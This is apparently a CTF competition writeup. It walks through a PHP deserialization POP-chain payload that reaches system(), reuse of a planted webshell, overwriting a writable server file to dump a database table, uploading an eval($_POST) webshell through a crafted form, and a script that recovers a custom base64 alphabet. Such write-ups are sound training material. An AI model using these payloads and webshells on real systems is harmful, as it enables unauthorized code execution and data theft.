天山固网 Online Round Writeup

Web (solved 2 of 3)

The first thing to do is read the source:

<?php
header("Content-type:text/html;charset=utf-8");
show_source(__FILE__);
error_reporting(0);
class Flag{
    public $a;
    public $b;
    public $c;
    public function __construct(){
        $this->a = 123123;
        $this->b = 'pwd';
        $this->arr = array();
    }

    public function __destruct(){
        echo $a;
        $this->arr[$this->a]=1;
        if ($this->arr[]=1){
            echo 'Please!!!';
            }
        else{
            system($this->b);
            }
        }
}
$was = $_GET['was'];
unserialize($was); 

This is a POP chain. In __destruct the array is used as a check: `$this->arr[$this->a] = 1` writes the key, and the `if` only fails when the following `$this->arr[] = 1` append cannot succeed. So I set `$a` to the maximum int value and relied on the fact that the next-index overflow makes the append come back empty, which drops execution into the `else` branch and `system($this->b)`. I followed this article: https://blog.csdn.net/starttv/article/details/127905422

<?php
class Flag{
    public $a;
    public $b;
    public $c;
}
$e = new Flag();
$e->b = 'ls';                  // command to run in __destruct
$e->a = 9223372036854775807;   // PHP_INT_MAX, so the following arr[] append fails
echo serialize($e);

But this did not work. Debugging locally showed that __construct is not called during unserialize, so the $arr property never exists on the object; I added it myself and rebuilt the chain:

<?php
class Flag{
    public $a;
    public $b;
    public $c;
    public $arr;

}
$e=new Flag();
$e->a=9223372036854775807;
$e->arr=array();
$e->b='ls';
echo serialize($e);

/img/天山/1.png
The listing shows test.php and a few other files; cat them to take a look.
/img/天山/2.png
One of them already contains a webshell, so I connected to it directly and found /var/www/html/sql_connect/sql-connect.php.

(I tried editing the code and, to my surprise, the file was writable, so I simply rewrote the source.)

<?php
$dbuser = 'root';
$dbpass = 'root';
$dbname = "dascctf";
$host = '127.0.0.1';


$con = mysqli_connect($host, $dbuser, $dbpass, $dbname) or die('Could not connect to database.');


$query = "SELECT * FROM flag"; // guessed table name
$result = mysqli_query($con, $query);

if ($result) {

    while ($row = mysqli_fetch_assoc($result)) {

        foreach ($row as $key => $value) {
            echo "$key: $value<br>";
        }
    }
} else {

    echo "Query failed: " . mysqli_error($con);
}


mysqli_close($con);
?>

Visiting /sql_connect/sql-connect.php directly then returns the flag.

/img/天山/3.png

/img/天山/4.png
Opening the site shows a lock; go in and take a look.
/img/天山/5.png
It is a simple file upload. Write a local form to upload a webshell:

<!DOCTYPE html>
<html>
<head>
    <title>文件上传表单</title>
</head>
<body>
    <form action="http://1.14.108.193:43321/Secr3t.php" method="post" enctype="multipart/form-data">
        <label for="file">选择文件:</label>
        <input type="file" name="file" id="file">
        <input type="submit" value="上传文件">
    </form>
</body>
</html>

Minimal webshell:

<?php
eval($_POST["123"]);
?>

Upload it:

/img/天山/6.png

/img/天山/7.png

Download the file first; it contains the key (a shuffled alphabet) and a base64-style encoded string:

/img/天山/8.png
Here I reused a script from a previous year's challenge: https://blog.csdn.net/qq_58370970/article/details/123339389

First, the script:

import string

# The leaked alphabet; the four '*' are the unknown positions.
s = 'YOJyHo57WlUFzCfDgjn0Sb9ET****sqVLX42kNaIhr+dtPm1u3AMKpwRGvcxQZ8B'
# The standard base64 alphabet to compare against.
j = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
for i in j:
    if i not in s:
        print(i)

This gives the 4 missing characters: ei6/

/img/天山/9.png

Their order is unknown, but there are only 24 possible orderings, so a script can try every variant of the base64 alphabet:

import binascii
import itertools
import string

table = "YOJyHo57WlUFzCfDgjn0Sb9ET****sqVLX42kNaIhr+dtPm1u3AMKpwRGvcxQZ8B"
cipher = "jHo0gpj5qwNVs5L3/aPVq9ZpEwCX/NZIz7jVs5Xr6pZa/5oIVg"  # (the trailing == is not needed)

# Print the alphabet symbols missing from the table (does not cover '+' and '/').
for i in string.ascii_letters + string.digits:
    if i not in table:
        print(i)

s = ['e', 'i', '6', '/']
for perm in itertools.permutations(s, 4):
    # Fill the four unknown slots with this ordering.
    ss = "YOJyHo57WlUFzCfDgjn0Sb9ET" + "".join(perm) + "sqVLX42kNaIhr+dtPm1u3AMKpwRGvcxQZ8B"
    # Each symbol contributes 6 bits; the trailing bits that do not fill a byte are padding.
    bits = "".join(bin(ss.index(j))[2:].zfill(6) for j in cipher)
    n_bytes = len(bits) // 8
    print(int(bits[:n_bytes * 8], 2).to_bytes(n_bytes, "big"))

Run it:

/img/天山/0.png
Several different candidate flags come out, but only one reads as the English sentence "i think you can get this flag"; the real flag is the second one:

DASCTF{i_th1nk_you_can_g0t_this_flag}
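The same recovery, written out as a reusable decoder rather than a one-off loop. This is an added example, not the author's script: it finds the missing symbols from the leaked table, fills the unknown slots with every permutation, decodes each variant by translating the custom alphabet onto the standard one (so the stdlib decoder handles the bit packing and the stripped padding), and keeps only the decodings that are printable ASCII, which is the selection the writeup did by eye. The table and ciphertext are the ones from the challenge above; the function and variable names are my own.

```python
import base64
import binascii
import itertools
import string

# Standard base64 alphabet, the target of the translation below.
STD_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"

# Values taken from the writeup: the leaked table with four unknown slots ("*")
# and the ciphertext with its "==" padding already dropped.
LEAKED_TABLE = "YOJyHo57WlUFzCfDgjn0Sb9ET****sqVLX42kNaIhr+dtPm1u3AMKpwRGvcxQZ8B"
CIPHERTEXT = "jHo0gpj5qwNVs5L3/aPVq9ZpEwCX/NZIz7jVs5Xr6pZa/5oIVg"


def missing_symbols(table: str) -> str:
    """Standard-alphabet symbols absent from the partial table, in alphabet order."""
    return "".join(c for c in STD_ALPHABET if c not in table)


def candidate_tables(table: str):
    """Yield every completion of the table: one permutation of the missing symbols per '*' slot."""
    gaps = table.count("*")
    for perm in itertools.permutations(missing_symbols(table), gaps):
        fill = iter(perm)
        yield "".join(next(fill) if c == "*" else c for c in table)


def decode_custom_b64(data: str, table: str) -> bytes:
    """Decode base64 written with a custom 64-symbol table.

    Rather than re-implementing the 6-bit packing, map each custom symbol to the
    standard symbol at the same index and let the stdlib decoder do the rest.
    The padding is restored because the challenge stripped it.
    """
    if len(table) != 64 or len(set(table)) != 64:
        raise ValueError("table must contain 64 distinct symbols")
    translated = data.translate(str.maketrans(table, STD_ALPHABET))
    translated += "=" * (-len(translated) % 4)
    return base64.b64decode(translated)


def is_printable_ascii(data: bytes) -> bool:
    return all(0x20 <= b < 0x7F for b in data)


def recover_candidates(data: str = CIPHERTEXT, table: str = LEAKED_TABLE) -> list:
    """Try every completion of the table; return the distinct decodings that are printable ASCII."""
    found = []
    for candidate in candidate_tables(table):
        try:
            plaintext = decode_custom_b64(data, candidate)
        except (ValueError, binascii.Error):
            continue
        if is_printable_ascii(plaintext):
            text = plaintext.decode("ascii")
            if text not in found:
                found.append(text)
    return found


if __name__ == "__main__":
    for text in recover_candidates():
        print(text)
```

Two of the four missing symbols never occur in this ciphertext, so their relative order cannot change the output; that is why the loop in the writeup prints the same flag for more than one permutation, and why the decoder above deduplicates before returning.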